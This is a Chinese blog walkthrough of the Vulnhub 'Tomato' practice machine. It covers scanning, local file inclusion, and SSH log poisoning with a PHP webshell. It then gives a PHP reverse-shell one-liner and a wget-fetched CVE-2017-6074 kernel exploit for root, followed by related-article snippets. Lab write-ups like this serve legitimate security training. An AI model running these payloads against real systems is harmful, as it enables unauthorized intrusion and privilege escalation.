Vulnhub---Tomato

最新推荐文章于 2023-09-15 22:58:50 发布
最新推荐文章于 2023-09-15 22:58:50 发布
阅读量416 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: linux git ssh web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56123950/article/details/117439425
版权

目录

Tomato(文件包含getshell)

这个靶机是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell
靶机下载地址:http://www.vulnhub.com/entry/tomato-1,557/

信息收集

扫描目标网段确定ip地址
nmap -sP 172.16.58.0/24

在这里插入图片描述

扫描该ip开放端口
nmap -A -p- 172.16.58.128

在这里插入图片描述
扫描出来的端口,针对打开的端口进行访问

发现漏洞

访问扫描出来的端口

在这里插入图片描述
8888端口登陆失败

爆破网站的目录

网站目录的扫描

dirb http://172.16.58.128

在这里插入图片描述

敏感文件泄漏
http://172.16.58.128/antibot_image/

在这里插入图片描述
访问发现phpinfo()
在这里插入图片描述
然后查看源代码,发现了文件包含
在这里插入图片描述

尝试进行文件包含

http://172.16.58.128/antibot_image/antibots/info.php?image=/etc/passwd

在这里插入图片描述
在这里插入图片描述
执行成功,存在文件包含漏洞,但只能包含本地文件

漏洞利用

还有一个2211端口是开启ssh服务的,可以利用一句话木马,写入日志,利用文件包含来getshell

ssh '<?php system($_GET['shell']); ?>'@172.16.58.128 -p2211

这样’<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去,ssh日志在/var/log/auth.log中

在这里插入图片描述

验证是否成功写入,查看页面源代码

http://172.16.58.128/antibot_image/antibots/info.php?image=/var/log/auth.log&shell=ls

在这里插入图片描述

进行getshell

开启nc监听
nc -lvnp 1234
反弹shell
php -r '$sock=fsockopen("172.16.58.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
进行URL编码,然后进行访问

http://172.16.58.128/antibot_image/antibots/info.php?image=…/…/…/…/…/…/…/…/…/var/log/auth.log&shell=php±r+%27%24sock%3dfsockopen(%22172.16.58.129%22%2c1234)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27

成功getshell

在这里插入图片描述

权限提升

首先在shell里建立可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
查看内核版本

uname -a

在这里插入图片描述
去github下载这本版本的exp

git clone https://github.com/kkamagui/linux-kernel-exploits.git

选择相应的目录
在这里插入图片描述
然后运行compile.sh 编译c文件
在这里插入图片描述
在该目录下开启http服务上传到目标主机

 python -m SimpleHTTPServer 8080

在这里插入图片描述

在getshell里下载该文件

先进到/tmp目录下

wget http://172.16.58.129:8080/CVE-2017-6074

在这里插入图片描述
查看文件权限

ls -l

在这里插入图片描述
赋予执行权限并执行该文件

chmod +x CVE-2017-6074

./CVE-2017-6074

在这里插入图片描述
最后取得root权限,实验成功。

从不专注的人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub篇Tomato
千寻的博客
01-12 642
环境搭建 下载地址: https://www.vulnhub.com/entry/tomato-1,557/ kali 192.168.232.140 tomato: 192.168.232.175 win10 :192.168.232.171 第一部分 信息收集 第一步 扫描,发现主机 nmap -sP 192.168.232.0/24 arp-scan -l 第二步 扫描开放的端口 nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.
tomato tomato-ND
09-10
【标题】:“tomato-ND”是一个与番茄(Tomato)相关的软件或系统,可能是某个定制版或非官方发行版的简称。ND可能代表“Non-Distribution”或“Non-Disclosure”,暗示这是一个非公开分发或有保密性质的版本。 ...
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
vulnhub之tomato(西红柿)
weixin_54431413的博客
06-30 728
文件包含漏洞,可以读取目标主机敏感文件,可以读取私钥文件,读取日志文件,如果开启开关的话,可以读取远程文件。 我们利用/var/log/auth.log写入失败信息,结合文件包含来执行反弹shell。后利用linux-exploit内核检测工具,挨个尝试,然后提权。 ...
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1848
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
vulnhub-symfonos-4(文件包含 & ssh投毒& 命令执行 & linux提权)
Ma79328的博客
04-30 683
vulnhub -symfonos4 靶场环境 靶机:172.168.20.133 kali:172.168.20.110 1、打开靶场浏览器访问靶场IP地址 2、扫描目录 使用kali自带目录扫描工具进行目录扫描 dirb http://172.168.20.133/ /usr/share/dirb/wordlists/big.txt -X .php 发现一个php的登陆页面 3、访问atlantis.php页面 使用万能密码绕过登录界面 5.发现文件包含,尝试包含ssh日志文件 #Linux
Tomato-Phoenix-V106-繁体版
06-01
"Tomato-Phoenix-V106-繁体版" 是一个特定版本的固件更新,主要针对路由器设备,特别是那些支持Tomato固件系列的路由器。Tomato是一种开源的、高度自定义的路由器固件,它基于Linux内核,提供了一系列高级功能,使...
Tomato-Phoenix-V105-繁体版
06-01
Tomato-Phoenix-V105-繁体版
Tomato-Phoenix-V104-繁体版
06-01
标题 "Tomato-Phoenix-V104-繁体版" 指的是一款基于Tomato固件的定制版本,名为Phoenix,其版本号为V104,并且是专为繁体中文用户设计的。Tomato是一种开源的路由器固件,它提供了许多高级功能和自定义选项,旨在...
tomato-K26-13.05.0041-MIPSR2-4M
06-01
tomato-K26-13.05.0041-MIPSR2-4M
vulhub php文件包含漏洞复现
weixin_53730939的博客
03-04 323
vulhub php文件包含漏洞复现过程
Vulnhub 靶机 zico2 write up phpLiteAdmin cms写入马+另一处文件包含页面 getshell sudo zip 提权
YouthBelief的博客
12-27 1794
Vulnhub 靶机 zcio2 write up0x00 靶机搭建0x01 信息收集0x02 漏洞挖掘思路一:80 http思路二:22ssh 爆破步骤一:80web探测发现目录遍历漏洞步骤二:寻找cms漏洞并利用步骤三:文件包含+上传蚁剑连接步骤四:翻翻文件步骤五:尝试ssh登录步骤六:提权0x03 总结 0x00 靶机搭建 下载链接 https://download.vulnhub.com/zico/zico2.ova 运行环境 VirtualBox 网络 仅主机 kali 也配置 该网
Vulnhub DC9|下载|渗透笔记|knockd敲门服务|文件包含漏洞
qq_60115503的博客
04-19 1296
VulnhubDC9下载靶场提取码:lyq1 将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透 主机发现 首先查看自己属于的网段ip 进行nmap主机发现 nmap -sP -sn 192.168.106.1/24 -sP进行主机发现发送ping包 -sn进行NULL扫描 探测到ip地址为192.168.106.129 所以我们进一步了解该靶场的服务 使用nmap -sV -A -T4 192.168.106......
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)
人间体佐菲的博客
09-24 829
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全,网络安全,渗透测试
VulnHub——CH4INRULZ
江左盟的博客
04-13 1113
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
Vulnhub_DC-5靶机渗透测试
m0_66225311的博客
09-15 66
界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面。察觉到该网站存在文件包含漏洞,但是不存在写shell的方式,只能包含文件来达到获取shell的方法,看来只能够包含日志文件了。但是接下来要爆破一下读取文件的参数变量才行。使用burp对包含参数进行爆破,读取Linux的密码。(img-z1SCeG9W-1694789906175)]fuzz字典爆破得到访问文件的参数是file 变量=index.php。
Evilscience靶机渗透实战-vulnhub系列(五)
PANDA墨森的博客
07-04 540
这是vulnhub靶机系列文章的第五篇,本次的靶机主要学习到的漏洞利用为文件包含漏洞,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/the-ether-evilscience,212 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13195877.html #001 环境搭建(nat) 攻击机kali:192168.136.129 靶机evilscience:192.168.136.143 ..
Tomato
weixin_45007073的博客
12-24 1518
信息收集 运行我们的bash脚本,发现目标系统开放了ftp和web服务 我们尝试是否可以匿名登录ftp,未果 我们访问web服务,发现是一个番茄图片,查看源码也没什么发现 我们fuzz一下路径,发现了存在一个antibot_image路径 dirsearch -u "http://192.168.101.197/" -e * -x404,500,403 -w /usr/share/seclists/Discovery/Web-Content/common.txt 我们发现存在一个info.php文
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
Aluxian_的博客
06-24 1612
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
xm-select数据结构
最新发布
05-17
xm-select 是一种基于 jQuery 的多选下拉框插件,它可以让用户在下拉框中进行多选操作。xm-select 的特点是支持搜索、支持分组、支持数据异步加载等,非常适合大型数据的多选场景。它的使用方法也非常简单,只需要引入相关的文件和样式,在 HTML 中添加相应的标签和属性即可。 以下是一个简单的 xm-select 示例: ```html <select name="fruit" xm-select="multi"> <optgroup label="水果"> <option value="apple">苹果</option> <option value="banana">香蕉</option> <option value="orange">橙子</option> </optgroup> <optgroup label="蔬菜"> <option value="carrot">胡萝卜</option> <option value="tomato">番茄</option> <option value="cucumber">黄瓜</option> </optgroup> </select> ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值